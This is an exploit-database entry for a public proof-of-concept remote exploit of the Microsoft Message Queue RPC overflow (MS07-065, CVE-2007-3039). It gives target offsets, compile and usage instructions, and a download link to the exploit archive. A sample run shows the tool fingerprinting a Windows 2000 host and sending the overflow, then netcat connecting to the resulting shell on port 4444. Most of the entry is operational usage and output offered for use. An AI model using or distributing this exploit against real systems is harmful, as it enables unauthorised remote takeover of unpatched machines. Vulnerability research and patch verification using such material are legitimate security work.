****************************************************************************** ********************** merry christmas Sysadmins ***************************** ****************************************************************************** ************** Microsoft Message Queue POC exploit ( MS07-065 ) ************** Mario Ballano - (mballano~gmail.com) - http://www.48bits.com Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org ****************************************************************************** * Original Advisory: http://www.zerodayinitiative.com/advisories/ZDI-07-076.html * Microsoft Bulletin : http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx * CVE Code: CVE-2007-3039 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039 * Timeline: No naked news this time, just rum and whiskey * Additional information: From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports for MQ 2101,2103,2105 HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html DaveŽs unmidl http://www.immunitysec.com/resources-freesoftware.shtml * How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and then exec nmake. * Note: There are several rpc ports to trigger the overflow. If you hit a system then looks like youŽll need to send the exploit twice or specify another port (-p ) to exploit it again. There is a chance that offsets are invalid for windows 2000 server (only spanish win2k advanced server was tested) Adjust them if needed. *Usage: C:\Programación\MessageQueue>MessageQueue.exe -------------------------------------------------------------- Microsoft MessageQueue local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 Advanced server SP4 -------------------------------------------------------------- Usage: MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang] Targets: 0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested) 1 (0x6b9d469b) - Windows 2000 Advanced server Spanish 2 (0x41414141) - Windows 2000 Advanced server crash C:\Programación\\MessageQueue>MessageQueue.exe -h 192.168.1.39 -------------------------------------------------------------- Microsoft MessageQueue local & remote RPC Exploit code Exploit code by Andres Tarasco & Mario Ballano Tested against Windows 2000 Advanced server SP4 -------------------------------------------------------------- [+] Binding to ncacn_ip_tcp:192.168.1.39 [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[LRPC00000414.00000001] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[QMsvc$testserver] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[QmReplService] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver] [+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0 [+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222] [+] Using gathered netbios name: testserver [+] Dynamic MessageQueue rpc port found (1222) [+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222] [+] RpcBindingFromStringBinding success [+] Trying to fingerprint target... [+] Fqdn name obtained from netbios packet: testserver.local [+] Remote OS Fingerprint (05.00) [+] Remote Host identified as Windows 2000 [+] Sending POC Exploit code to QMCreateObjectInternal() [+] Try to connect to remote host at port 4444 for a shell C:\>nc 192.168.1.39 4444 Microsoft Windows 2000 [Versión 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4760.zip (2007-MessageQueue.zip) # milw0rm.com [2007-12-21]